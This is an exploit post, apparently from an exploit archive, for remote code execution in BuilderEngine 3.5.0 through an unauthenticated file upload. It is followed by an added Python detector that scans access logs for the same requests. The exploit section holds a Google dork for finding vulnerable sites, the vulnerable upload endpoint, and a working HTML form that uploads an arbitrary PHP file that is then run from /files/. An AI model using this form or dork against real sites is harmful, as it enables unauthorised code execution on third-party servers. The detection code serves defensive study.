Posted by: ./B1TCHx, Wednesday, 30 November 2016

<!--
# Exploit Title: BuilderEngine 3.5.0 Remote Code Execution via elFinder 2.0
# Date: 18/09/2016
# Exploit Author: metanubix
# Vendor Homepage: http://builderengine.org/
# Software Link: http://builderengine.org/page-cms-download.html
# Version: 3.5.0
# Tested on: Kali Linux 2.0 64 bit
# Google Dork: intext:"BuilderEngine Ltd. All Right Reserved"
 
1) Unauthenticated Unrestricted File Upload:
 
    POST /themes/dashboard/assets/plugins/jquery-file-upload/server/php/
 
    Vulnerable Parameter: files[]
 
    We can upload test.php and reach the file via the following link:
    /files/test.php
-->
<html>
<body>
<form method="post" action="http://localhost/themes/dashboard/assets/plugins/jquery-file-upload/server/php/" enctype="multipart/form-data">
    <input type="file" name="files[]" />
    <input type="submit" value="send" />
</form>
</body>
</html>
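
A detection sketch for the two requests the advisory describes, added here as an example and not part of the original post or exploit: it scans access-log lines for successful POSTs to the upload handler and for script files served from /files/. The Combined Log Format, the extension list and the sample log lines are assumptions constructed for illustration.

```python
import re
from datetime import datetime

# Paths taken from the advisory above.
UPLOAD_PATH = "/themes/dashboard/assets/plugins/jquery-file-upload/server/php/"
FILES_PREFIX = "/files/"
# Assumption: extensions the web server may hand to an interpreter.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)

# Combined Log Format: ip - user [time] "METHOD path proto" status size ...
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

def find_upload_abuse(lines):
    """Return findings: uploads to the handler and script hits under /files/."""
    findings, uploaders = [], {}
    for raw in lines:
        m = LINE.match(raw)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, method, status = m["ip"], m["method"], int(m["status"])
        path = m["path"].split("?", 1)[0]  # ignore the query string
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        if method == "POST" and path.startswith(UPLOAD_PATH) and status < 400:
            uploaders[ip] = ts
            findings.append(("upload", ip, path, ts))
        elif path.startswith(FILES_PREFIX) and SCRIPT_EXT.search(path) and status == 200:
            # Higher confidence when the same client used the upload handler earlier.
            kind = "upload-then-exec" if ip in uploaders else "script-in-files"
            findings.append((kind, ip, path, ts))
    return findings

# Constructed sample log lines (not from a real server).
SAMPLE_LOG = [
    '203.0.113.7 - - [30/Nov/2016:10:01:02 +0000] "GET / HTTP/1.1" 200 5120 "-" "-"',
    '203.0.113.7 - - [30/Nov/2016:10:01:09 +0000] "POST /themes/dashboard/assets/plugins/jquery-file-upload/server/php/ HTTP/1.1" 200 310 "-" "-"',
    '203.0.113.7 - - [30/Nov/2016:10:01:15 +0000] "GET /files/test.php HTTP/1.1" 200 12 "-" "-"',
    '198.51.100.4 - - [30/Nov/2016:10:02:00 +0000] "GET /files/logo.png HTTP/1.1" 200 9000 "-" "-"',
    '198.51.100.4 - - [30/Nov/2016:10:03:00 +0000] "GET /files/test.php?x=1 HTTP/1.1" 200 12 "-" "-"',
]

if __name__ == "__main__":
    for kind, ip, path, ts in find_upload_abuse(SAMPLE_LOG):
        print(f"{ts.isoformat()} {kind:17} {ip:15} {path}")
```

Because the upload handler requires no authentication, any successful POST to it from an unexpected client is worth reviewing, and any script served with status 200 from /files/ should be treated as a possible uploaded file.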
